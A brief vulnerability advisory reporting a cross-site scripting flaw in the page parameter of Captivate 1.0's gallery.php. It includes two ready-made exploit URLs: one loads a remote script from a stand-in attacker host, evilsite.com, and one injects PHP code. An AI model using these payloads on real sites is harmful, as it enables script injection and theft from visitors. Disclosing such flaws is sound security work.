Captivate version 1.0 is susceptible to cross site scripting attacks.
849931fd6bbdf68ae26154e13dfd725c74ef0630beafbf6a1a96a2aaf30f44c6
Captivate 1.0
Homepage:
http://new-place.org/scripts/
Description:
A basic but highly-customizable PHP gallery script with optional thumbnail creation. Designed with screencaps in mind, it works best for large galleries of same-sized images.
Effected files:
gallery.php
Inproper filtering of action ?page= can lead to XSS.
Exploit:
One way to XSS would be renaming your JavaScript file to an image as an XSS vector:
http://www.example.com/gallery.php?page=5<SCRIPT SRC=http://evilsite.com/xss.jpg></SCRIPT>
Anoother one be:
http://www.example.com/gallery.php?page=<?phpinfo();?>
The current version of this script puts slashes in for ' and " but alot of other characters aren't filtered.